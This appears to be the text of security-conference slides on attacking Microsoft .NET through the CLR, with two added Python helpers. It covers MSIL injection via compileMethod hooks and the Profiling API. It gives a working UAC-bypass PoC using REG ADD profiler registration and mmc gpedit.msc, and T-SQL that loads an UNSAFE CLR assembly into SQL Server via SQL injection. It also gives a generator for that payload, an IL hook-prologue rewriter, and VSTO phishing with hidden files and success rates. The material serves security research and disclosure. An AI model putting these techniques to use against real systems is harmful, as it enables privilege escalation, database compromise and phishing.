Attacking Microsoft .NET Framework through CLR
MerJerson, Redrain
Qihoo 360CERT
Who are we
• MerJerson
  • 360CERT
  • Security researcher
  • Lead author of this paper
• Redrain
  • 360CERT
  • Security researcher
  • CVE generator
  • Speaker at HITB, HITCON, RUXCON, xKungfoo, Syscan360
  • Member of Light4Freedom
  • Co-author of this paper
  • http://www.hackdog.me
Who are we
• 360CERT
  360 Computer Emergency Response Team is a young and powerful team set up last year. We focus on emergency response for cyberspace upstream, malware analysis, and threat hunting.
• http://cert.360.cn
Agenda
➢ .NET Framework and CLR
  Primer
  Metadata and IL code
  Some points
➢ History Review
  MSIL injection
  UAC bypass
  Attack SQL Server via SQLi
➢ Learn the New by Restudying the Old
  VSTO in Office
  Attack Office via VSTO
  Exploit in the real world
  More vulnerabilities
.NET Framework and CLR
Primer
• Common Language Runtime (CLR)
• Metadata
• Managed Code – MSIL bytecode
Metadata and the PE File Structure
Metadata tables (the #~ stream of the CLI metadata):
• Definition tables
• Reference tables
• Pointer tables
• Heaps (#Strings, #US, #Blob, #GUID)
Metadata Tokens
From source to execution: source code is compiled to MSIL (managed code); the CLR loads the assembly and JIT-compiles the MSIL to machine code, which then runs.

CLR hosting structure: the OS runs processes; each process hosts one CLR instance, and the CLR isolates code into one or more AppDomains inside that process.
History Review
MSIL injection
• CLR hijacking (plan A)
  • Hook compileMethod
  • Replace the IL code
  • Reset pre-JITted methods
• CLR hijacking (plan B)
  • Install a trampoline
  • Define a dynamic method
  • Pass the parameters
  • Load the assembly by calling custom code
• Profiling API injection
  • Intercept the JIT
  • Replace the IL code
  • Return the new IL code to the JIT
CLR hijacking (plan A)
• Locate the injection target by GetMethod()

    public MethodInfo GetMethod(string name, BindingFlags bindingAttr)

• Hook compileMethod

    // hook and replace the JIT's compileMethod with my own
    NTSTATUS ntStatus = LhInstallHook((PVOID&)ICorJitCompiler::s_pfnCompileMethod,
                                      &(PVOID&)CInjection::compileMethod,
                                      NULL, &s_hHookCompileMethod);

• Replace the IL code (inside the compileMethod hook)

    // find the method to be replaced
    std::map<CORINFO_METHOD_HANDLE, ILCodeBuffer>::iterator iter =
        s_mpILBuffers.find((CORINFO_METHOD_HANDLE)pMethodDesc);
    if (iter != s_mpILBuffers.end()) {
        tILCodeBuffer = iter->second;
        pCorMethodInfo->ILCode = tILCodeBuffer.pBuffer;
        pCorMethodInfo->ILCodeSize = tILCodeBuffer.dwSize;
    }
    CorJitResult result = pCorJitCompiler->compileMethod(pJitInfo, pCorMethodInfo, nFlags,
                                                         pEntryAddress, pSizeOfCode);
    return result;

• Reset pre-JITted methods so that the hooked JIT gets to see them again (MethodDesc::Reset from the CLR source)

    void MethodDesc::Reset()
    {
        ...
        ClearFlagsOnUpdate();
        if (HasPrecode()) {
            GetPrecode()->Reset();
        }
        else {
            _ASSERTE(GetLoaderModule()->IsReflection());
            InterlockedUpdateFlags2(enum_flag2_HasStableEntryPoint | enum_flag2_HasPrecode, FALSE);
            *GetAddrOfSlotUnchecked() = GetTemporaryEntryPoint();
        }
        _ASSERTE(!HasNativeCode());
    }
CLR hijacking (plan B)
• Install a trampoline at the beginning of the compiled code. The trampoline calls a dynamically defined method.
• Define a dynamic method with a specific method signature.
• Construct an array of objects that holds the parameters passed to the method.
• Invoke a dispatcher function that loads our assembly and finally calls our code, passing a handle to the original method and the array of objects representing the method parameters.
• Repair the assembly.
MSIL injection
• Profiling API
  • JITCompilationStarted
  • GetILFunctionBody and SetILFunctionBody
  • Adjust the program
MSIL injection: Profiling API callbacks

JITCompilationStarted
    HRESULT JITCompilationStarted( [in] FunctionID functionId, [in] BOOL fIsSafeToBlock);

GetILFunctionBody
    HRESULT GetILFunctionBody( [in] ModuleID moduleId, [in] mdMethodDef methodId, [out] LPCBYTE *ppMethodHeader, [out] ULONG *pcbMethodSize);

SetILFunctionBody
    HRESULT SetILFunctionBody( [in] ModuleID moduleId, [in] mdMethodDef methodid, [in] LPCBYTE pbNewILMethodHeader);
MSIL injection
• Restore the runtime
  • Header
    • Code size
    • Set the header
  • State
    • Stack
    • Heap
    • Parameters
    • Return address
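The body handed back through SetILFunctionBody has to carry a header whose format and code size match the new IL, which is what the "Header / Code size / Set the header" bullets refer to. The following is an added example, not code from the slides or from the authors' tool: it decodes the ECMA-335 tiny and fat method headers, rebuilds a body after a hook prologue is prepended, and splits metadata tokens into table and row. The sample IL bytes and the tokens 0x70000001, 0x0A000002 and 0x06000003 are constructed for illustration.

```python
"""Tiny/fat IL method-body headers for SetILFunctionBody-style rewrites.

Added example, not code from the slides: the profiler gets a raw method body
from GetILFunctionBody and must hand back a body whose header and code size
match the new IL. The sample body and metadata tokens are constructed.
"""
import struct

# ECMA-335 II.25.4: method header formats and fat-header flags
TINY_FORMAT = 0x2
FAT_FORMAT = 0x3
FAT_MORE_SECTS = 0x8
FAT_INIT_LOCALS = 0x10

# Metadata token = table id (high byte) | row id (low 24 bits), ECMA-335 II.22
TABLE_NAMES = {0x01: "TypeRef", 0x02: "TypeDef", 0x06: "MethodDef",
               0x0A: "MemberRef", 0x11: "StandAloneSig", 0x70: "UserString"}

# Constructed sample: ldstr <0x70000001>; call <0x0A000002>; ret  (11 bytes)
SAMPLE_CODE = b"\x72\x01\x00\x00\x70" + b"\x28\x02\x00\x00\x0A" + b"\x2A"
SAMPLE_TINY = bytes([(len(SAMPLE_CODE) << 2) | TINY_FORMAT]) + SAMPLE_CODE


def decode_token(token):
    """Split a metadata token into (table name, row id)."""
    table, rid = token >> 24, token & 0x00FFFFFF
    return TABLE_NAMES.get(table, "0x%02X" % table), rid


def parse_method_body(body):
    """Decode a tiny or fat header; returns code, max_stack, locals token, flags."""
    first = body[0]
    if (first & 0x3) == TINY_FORMAT:
        size = first >> 2                         # tiny: 6-bit code size, maxstack 8
        return {"fat": False, "max_stack": 8, "locals_token": 0,
                "init_locals": False, "code": bytes(body[1:1 + size])}
    if (first & 0x3) != FAT_FORMAT:
        raise ValueError("unknown method header format")
    flags_size, max_stack, code_size, locals_token = struct.unpack_from("<HHII", body, 0)
    flags, hdr_len = flags_size & 0x0FFF, (flags_size >> 12) * 4
    if flags & FAT_MORE_SECTS:
        # Exception clauses carry absolute code offsets; a rewrite would have to
        # relocate them, so refuse instead of silently corrupting the method.
        raise ValueError("method has extra sections (EH clauses); not handled here")
    return {"fat": True, "max_stack": max_stack, "locals_token": locals_token,
            "init_locals": bool(flags & FAT_INIT_LOCALS),
            "code": bytes(body[hdr_len:hdr_len + code_size])}


def build_method_body(code, max_stack=8, locals_token=0, init_locals=False):
    """Emit the smallest valid header for the given code (tiny when allowed)."""
    if max_stack <= 8 and locals_token == 0 and len(code) < 64 and not init_locals:
        return bytes([(len(code) << 2) | TINY_FORMAT]) + code
    flags = FAT_FORMAT | (FAT_INIT_LOCALS if init_locals else 0)
    return struct.pack("<HHII", flags | (3 << 12), max_stack, len(code), locals_token) + code


def prepend_call(body, method_token):
    """Hook prologue: insert `call <method_token>` ahead of the original IL.

    IL branch offsets are relative to the following instruction, so bytes
    added before the code do not shift them; only the header changes.
    """
    info = parse_method_body(body)
    prologue = b"\x28" + struct.pack("<I", method_token)   # call <token>
    return build_method_body(prologue + info["code"], info["max_stack"],
                             info["locals_token"], info["init_locals"])


if __name__ == "__main__":
    hooked = prepend_call(SAMPLE_TINY, 0x06000003)         # constructed MethodDef token
    print("original:", SAMPLE_TINY.hex())
    print("hooked:  ", hooked.hex())
    for tok in (0x70000001, 0x0A000002, 0x06000003):
        print("%08X -> %s rid %d" % ((tok,) + decode_token(tok)))
```

The prologue call must target a static method taking no arguments so that max stack stays valid; if the hook pushes arguments, raise max_stack accordingly, and a body with extra sections (try/catch) needs its clause offsets relocated before it can be rewritten this way.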
MSIL injection
Add the profiler: set COR_ENABLE_PROFILING and COR_PROFILER in the environment of the target process. COR_PROFILER takes either the CLSID or the ProgID of the profiler's COM class:

    set COR_ENABLE_PROFILING=1
    set COR_PROFILER={32E2F4DA-1BEA-47ea-88F9-C5DAF691C94A}
    set COR_PROFILER="MyProfiler"
MSIL injection: the three approaches compared

                     Hook compileMethod          Trampoline                      Profiling API
Injection position   Before JIT
Entry                Hook compileMethod          Calli trampoline                JITCompilationStarted
Essence              Modify itself dynamically   Calli to dispatcher function    Profiling monitor
Injection            Modify compileMethod        Invoking the user-defined code  SetILFunctionBody
Scope                Modify IL code itself /     Invoke an arbitrary function    Modify program entry
                     couldn't add new data
UAC bypass
• Set the environment variables (persistently, under HKCU\Environment)
• An auto-elevated .NET host initializes the CLR
• The CLR loads the profiler DLL
• Code runs in the elevated process: UAC bypassed

Set the env vars:
    COR_ENABLE_PROFILING=1
    COR_PROFILER={GUID}
    COR_PROFILER_PATH=C:\hitb.dll

PoC by PowerShell (mmc.exe auto-elevates, and the gpedit.msc snap-in brings in the CLR, which picks up the per-user profiler registration):
    REG ADD "HKCU\Software\Classes\CLSID\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\InprocServer32" /ve /t REG_EXPAND_SZ /d "C:\hitb.dll" /f
    REG ADD "HKCU\Environment" /v "COR_PROFILER" /t REG_SZ /d "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" /f
    REG ADD "HKCU\Environment" /v "COR_ENABLE_PROFILING" /t REG_SZ /d "1" /f
    mmc gpedit.msc
SQL Server injection
    CREATE ASSEMBLY [demo] AUTHORIZATION [dbo] FROM 0x4D5A90000... WITH PERMISSION_SET = UNSAFE;
    CREATE PROCEDURE [dbo].[WirteFile] AS EXTERNAL NAME [demo].[StoredProcedures].[SQLPcd];
    EXEC [dbo].[WirteFile];
• Create a SQL Server project in Visual Studio
• Create a custom stored procedure backed by a CLR assembly
• Delivered through the SQL injection, this makes SQL Server load an arbitrary DLL into its own process
• Restrictions • CLR support enabled on SQL Server (could turn on by sql)
• Exec privilege (could be elevated by dba)
• Significance • xp_cmd_shell can’t be restore
• New way to elevation of dba privilege
• Bypass waf and AV in real world
sp_configure 'clr enable’, 1;go;reconfigure;go
alter database [dbname] set trustworthy on
![Page 34: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/34.jpg)
![Page 35: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/35.jpg)
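The hex literal in CREATE ASSEMBLY is the raw PE file, and SQL Server will only accept it if the file is a managed assembly, which ties back to the metadata and PE structure primer earlier in the deck. The script below is an added example and not the slides' tooling: it locates the CLI header through the PE optional header's data directory 14 (the same check a defender can run on a blob pulled from a CREATE ASSEMBLY statement in the logs), then emits the three statements shown above. The assembly, procedure, class and method names are the slide's PoC names; _fake_managed_pe() is a constructed header-only image with no code, standing in for a real DLL.

```python
"""Generate the CREATE ASSEMBLY payload from a DLL after checking it is managed.

Added example, not the slides' code: walks the PE headers for the CLI header
entry (data directory 14) that marks a .NET assembly, then hex-encodes the
file into the T-SQL above. The PoC names (demo, WirteFile, StoredProcedures,
SQLPcd) are the slide's; `_fake_managed_pe()` is a constructed header-only
image with no code, standing in for a real DLL.
"""
import struct

CLR_RUNTIME_DIR = 14          # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def clr_header_directory(data):
    """Return (rva, size) of the CLI header, or None for a native PE."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                           # skip signature + COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                                # PE32
        dirs = opt + 96
    elif magic == 0x20B:                              # PE32+
        dirs = opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%X" % magic)
    if struct.unpack_from("<I", data, dirs - 4)[0] <= CLR_RUNTIME_DIR:
        return None                                   # too few directories: native
    rva, size = struct.unpack_from("<II", data, dirs + CLR_RUNTIME_DIR * 8)
    return (rva, size) if size else None


def create_assembly_sql(name, dll, proc, cls, method, permission_set="UNSAFE"):
    """T-SQL that registers `dll` as assembly `name` and exposes `cls.method`."""
    if clr_header_directory(dll) is None:
        raise ValueError("%s is not a managed (CLI) assembly" % name)
    blob = "0x" + dll.hex().upper()
    return "\n".join([
        "CREATE ASSEMBLY [%s] AUTHORIZATION [dbo] FROM %s WITH PERMISSION_SET = %s;"
        % (name, blob, permission_set),
        "CREATE PROCEDURE [dbo].[%s] AS EXTERNAL NAME [%s].[%s].[%s];" % (proc, name, cls, method),
        "EXEC [dbo].[%s];" % proc,
    ])


def _fake_managed_pe():
    """Constructed PE32 header with a non-empty CLI directory entry (no real code)."""
    img = bytearray(0x200)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)           # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    opt = 0x80 + 4 + 20
    struct.pack_into("<H", img, opt, 0x10B)
    struct.pack_into("<I", img, opt + 92, 16)         # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + 96 + CLR_RUNTIME_DIR * 8, 0x2008, 0x48)
    return bytes(img)


def _fake_native_pe():
    """Same constructed image with the CLI entry zeroed, i.e. an unmanaged DLL."""
    img = bytearray(_fake_managed_pe())
    opt = 0x80 + 4 + 20
    struct.pack_into("<II", img, opt + 96 + CLR_RUNTIME_DIR * 8, 0, 0)
    return bytes(img)


if __name__ == "__main__":
    print(create_assembly_sql("demo", _fake_managed_pe(), "WirteFile",
                              "StoredProcedures", "SQLPcd")[:120] + "...")
```

On the defensive side the same indicators are queryable after the fact: user-defined rows in sys.assemblies with permission_set_desc = 'UNSAFE', databases with is_trustworthy_on = 1 in sys.databases, and a 'clr enabled' value of 1 from sp_configure.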
Learn the new by restudying the old
VSTO Attack Vectors
• VSTO development
• VSTO weak points
VSTO Attack Vectors: Office project types that can carry a VSTO customization
• Excel: workbook, template
• InfoPath
• Outlook
• PowerPoint
• Visio
• Word: document, template
VSTO Attack Vectors
Needs to be solved:
• Certificate: the customization is signed, and Office prompts the user to trust the publisher
• Additional files: the deployment manifest and the assembly ship alongside the document

Hide the additional files next to the document:
    attrib +s +a +h +r document
VSTO weakness
• Document phishing
• Persistent backdoor
VSTO phishing
Phishing document types seen in the wild (pie chart): macros 59.59%, vulnerability exploits 36%, feature abuse and others 5%.
VSTO phishing in the real world
• Set up a probe
• Result: phishing success proportion (hit vs. missed)
VSTO phishing
• Macro phishing: 11%–14% success
• DDE phishing: nearly 30% success
• VSTO phishing with hidden files: nearly 40% success
VSTO weakness
VSTO loading sequence:
• Office checks the registry
• The application loads VSTOEE.dll, which loads VSTOLoader.dll
• VSTOLoader.dll starts the managed portion of the Visual Studio Tools for Office runtime
• Security checks
• Check for assembly updates
• Create a new application domain
• Load the VSTO add-in assembly into the application domain
VSTO weakness
Attack surface in VSTO's own mechanism:
• DLL hijacking
• Profiling injection
• Config hijacking
More vulnerabilities
• The .NET Framework includes the CLR
• C# is compiled to IL, which the CLR translates to machine code at run time
• Fuzz the IL code by MSIL injection
• Monitor the .NET application's status upstream to judge whether it crashed or hung

Fuzzer architecture: Target.exe calls Target.dll; the MSIL fuzzer, an agent, a logger and a verifier drive and observe the run.
CVE-2017-0564,CVE-2017-0483,CVE-2017-0526,CVE-2017-0527,CVE-2017-0333,CVE-2017-0479,CVE-2017-0480,
CVE-2017-0450,CVE-2017-0448,CVE-2017-0436,CVE-2017-0444,CVE-2017-0435,CVE-2017-0429,CVE-2017-0428,
CVE-2017-0425,CVE-2017-0418,CVE-2017-0417,CVE-2017-0402,CVE-2017-0401,CVE-2017-0400,CVE-2017-0398,
CVE-2017-0385,CVE-2017-0384,CVE-2017-0383,CVE-2016-10291,CVE-2016-8481,CVE-2016-8480,CVE-2016-8449,
CVE-2016-8435,CVE-2016-8432,CVE-2016-8431,CVE-2016-8426,CVE-2016-8425,CVE-2016-8400,CVE-2016-8392,
CVE-2016-8391,CVE-2016-6791,CVE-2016-6790,CVE-2016-6789,CVE-2016-6786,CVE-2016-6780,CVE-2016-6777,
CVE-2016-6775,CVE-2016-6765,CVE-2016-6761,CVE-2016-6760,CVE-2016-6759,CVE-2016-6758,CVE-2016-6746,
CVE-2016-6736,CVE-2016-6735,CVE-2016-6734,CVE-2016-6733,CVE-2016-6732,CVE-2016-6731,CVE-2016-6730,
CVE-2016-6720,CVE-2016-3933,CVE-2016-3932,CVE-2016-3909,CVE-2016-5342,CVE-2016-3895,CVE-2016-3872,
CVE-2016-3871,CVE-2016-3870,CVE-2016-3857,CVE-2016-3844,CVE-2016-3835,CVE-2016-3825,CVE-2016-3824,
CVE-2016-3823,CVE-2016-3774,CVE-2016-3773,CVE-2016-3772,CVE-2016-3771,CVE-2016-3770,CVE-2016-3765,
CVE-2016-3747,CVE-2016-3746,CVE-2016-2486,CVE-2016-2485,CVE-2016-2484,CVE-2016-2483,CVE-2016-2482,
CVE-2016-2481,CVE-2016-2480,CVE-2016-2479,CVE-2016-2478,CVE-2016-2477,CVE-2016-2452,CVE-2016-2451,
CVE-2016-2450,CVE-2016-2449,CVE-2016-2448,CVE-2016-2442,CVE-2016-2441,CVE-2016-2437,SVE-2016-5393,
CVE-2015-1805,CVE-2016-0826,CVE-2016-0804,CVE-2015-8681,CVE-2015-8318,CVE-2015-8307,CVE-2015-5524,
CVE-2015-8089,CVE-2015-3869,CVE-2015-3868,CVE-2015-3865,CVE-2015-3862,CVE-2015-0573,CVE-2015-0568
Hackers:
Antonio "s4tan" Parata
cyg07@360
sweeper & d4rker @kylin team
Link:http://phrack.org/papers/dotnet_instrumentation.html